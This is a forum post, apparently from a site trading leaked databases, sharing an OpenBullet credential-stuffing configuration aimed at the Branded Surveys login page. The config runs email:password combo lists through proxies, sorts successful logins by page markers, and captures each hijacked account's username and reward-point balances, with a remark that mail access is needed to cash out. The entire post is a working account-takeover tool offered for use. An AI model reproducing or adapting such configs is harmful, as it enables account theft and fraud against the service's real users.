• Join our Telegram Channel to receive notifications when new databases are released!

Open Bullet Surveys.gobranded With Capture [.ANOM]

Anduril

Newbie
70
2
Combo: Email : Pass
Proxy: Yes
Capture: Yes
Capture Info:Username/Points Available/ Branded Points

[SETTINGS]
{
"Name": "Branded Surveys",
"SuggestedBots": 100,
"MaxCPM": 0,
"LastModified": "",
"AdditionalInfo": "Mail Access Required for Cashout",
"Author": "YASHVIRGAMING",
"Version": "1.4.4 [Anomaly]",
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": true,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"EncodeData": false,
"AllowedWordlist1": "MailPass",
"AllowedWordlist2": "MailPass",
"DataRules": [],
"CustomInputs": [],
"CaptchaUrl": "",
"Base64": "",
"Grayscale": false,
"RemoveLines": false,
"RemoveNoise": false,
"Dilate": false,
"Threshold": 1.0,
"DiffKeep": 0.0,
"DiffHide": 0.0,
"Saturate": false,
"Saturation": 0.0,
"Transparent": false,
"Contour": false,
"OnlyShow": false,
"ContrastGamma": false,
"Contrast": 1.0,
"Gamma": 1.0,
"Brightness": 1.0,
"RemoveLinesMin": 0,
"RemoveLinesMax": 0,
"Crop": false,
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://surveys.gobranded.com/users/login/"
CONTENT "_method=POST&email=<USER>&password=<PASS>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "Host: surveys.gobranded.com"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
HEADER "Accept-Language: en-GB,en;q=0.5"
HEADER "Accept-Encoding: gzip, deflate, br"
HEADER "Content-Type: application/x-www-form-urlencoded"
HEADER "Content-Length: 60"
HEADER "Origin: https://surveys.gobranded.com"
HEADER "Connection: keep-alive"
HEADER "Referer: https://surveys.gobranded.com/users/login/"

KEYCHECK
KEYCHAIN Failure OR
KEY "<div class=\"alert alert-danger\">"
KEY "Error 404"
KEYCHAIN Success OR
KEY "Logging you in"
KEY "<ADDRESS>" Contains "/members"

REQUEST GET "https://surveys.gobranded.com/members"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

#Username PARSE "<SOURCE>" LR "<div class=\"pull-left user-name\">Hi, " "</div>" CreateEmpty=FALSE -> CAP "Username"

REQUEST GET "https://surveys.gobranded.com/my-points"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

#Points_Available PARSE "<SOURCE>" LR "<div class=\"points-count\">" "</div>" CreateEmpty=FALSE -> CAP "Points Available"

REQUEST GET "https://surveys.gobranded.com/users/branded_elite"

HEADER "Host: surveys.gobranded.com"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
HEADER "Accept-Language: en-GB,en;q=0.5"
HEADER "Accept-Encoding: gzip, deflate, br"
HEADER "Referer: https://surveys.gobranded.com/users/badge_bonuses"
HEADER "Connection: keep-alive"

#Branded_Points PARSE "<SOURCE>" LR "<p class=\"m-0 text-secondary\">" "</p>" CreateEmpty=FALSE -> CAP "Branded Points"